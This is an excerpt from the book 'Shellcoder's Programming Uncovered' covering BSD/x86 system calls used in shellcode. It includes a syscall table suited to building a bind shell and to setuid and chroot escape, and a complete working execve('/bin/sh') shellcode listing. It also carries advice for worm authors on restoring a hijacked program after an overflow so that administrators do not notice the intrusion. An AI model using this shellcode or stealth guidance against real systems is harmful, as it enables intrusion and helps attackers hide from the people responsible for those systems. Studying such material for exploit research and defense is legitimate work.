Operating systems from the BSD family implement a hybrid mechanism of calling system functions: they support both the far call to the 0007:00000000 address (however, the numbers of system functions are different) and the interrupt at vector 80h. Arguments in both cases are passed through the stack. The list of numbers of the most widely used system functions is provided in Listing 10.22. Listing 10.23 provides an example of shellcode demonstrating the use of system calls under BSD/x86.

Listing 10.22: Numbers of system calls in BSD/x86

    Syscall      %EAX  stack
    Execve       3Bh   RET, path = "//bin//sh", [a0 = 0], 0
    Execve       3Bh   RET, path = "//bin//sh", [a0 = path, a1 = "-c", a2 = cmd, 0], 0
    Setuid       17h   RET, uid = 0
    Mkdir        88h   RET, path = "b..", mode = (each value is valid)
    Chroot       3Dh   RET, path = "b..", "."
    Chdir        0Ch   RET, path = ".."
    Getpeername  1Fh   RET, sfd, sadr = [], [len = 10h]
    Socket       61h   RET, AF_INET = 2, SOCK_STREAM = 1, prot = 0
    Bind         68h   RET, sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], [10h]
    Listen       6Ah   RET, sfd, backlog = 5
    Accept       1Eh   RET, sfd, 0, 0
    dup2         5Ah   RET, sfd, fd = 0, 1, 2
 
Listing 10.23: An example illustrating shellcode under BSD/x86

    char shellcode[]=  /* 23 bytes */
    "\x31\xc0"         /* XORL %EAX, %EAX    ; EAX := 0                               */
    "\x50"             /* PUSHL %EAX         ; Push the terminating zero into         */
                       /*                    ; the stack.                             */
    "\x68""//sh"       /* PUSHL $0x68732f2f  ; Push the string tail into the stack.   */
    "\x68""/bin"       /* PUSHL $0x6e69622f  ; Push the string head into the stack.   */
    "\x89\xe3"         /* MOVL %ESP, %EBX    ; Set EBX to the stack top.              */
    "\x50"             /* PUSHL %EAX         ; Push zero into the stack.              */
    "\x54"             /* PUSHL %ESP         ; Pass the zero pointer to the function. */
    "\x53"             /* PUSHL %EBX         ; Pass the pointer to /bin/sh to         */
                       /*                    ; the function.                          */
    "\x50"             /* PUSHL %EAX         ; Pass zero to the function.             */
    "\xb0\x3b"         /* MOVB $0x3b, %AL    ; Number of the execve system function   */
    "\xcd\x80";        /* INT $0x80          ; execve("//bin//sh", "",0);             */
 

Recovering the Vulnerable Program after Overflow

Restoring the vulnerable program to a working state after the overflow is not only a guarantee of keeping the intrusion secret but also an indicator of a certain level of culture. Having accomplished its mission, the worm must not simply return control to the host program, because the program will almost certainly crash, which will make an administrator suspicious.

If every new TCP/IP connection is processed by a vulnerable program in a separate thread, then for the virus it will be enough to simply kill its thread by calling the TerminateThread API function. It is also possible to enter an endless loop (however, on a uniprocessor machine the CPU load might grow to 100%, which also raises suspicions).

With single-threaded applications, the situation is more difficult. The worm must on its own "manually" recover the damaged data in a workable form, or unwind the stack. It must emerge somewhere in the parent function, which is not touched by corruption yet, or even pass control to some dispatcher function involved in sending messages.

For the moment, no universal techniques have been invented, although in recent years this topic has been actively discussed and is being worked out.



Shellcoder's Programming Uncovered
ISBN: 193176946X
Year: 2003
Pages: 164
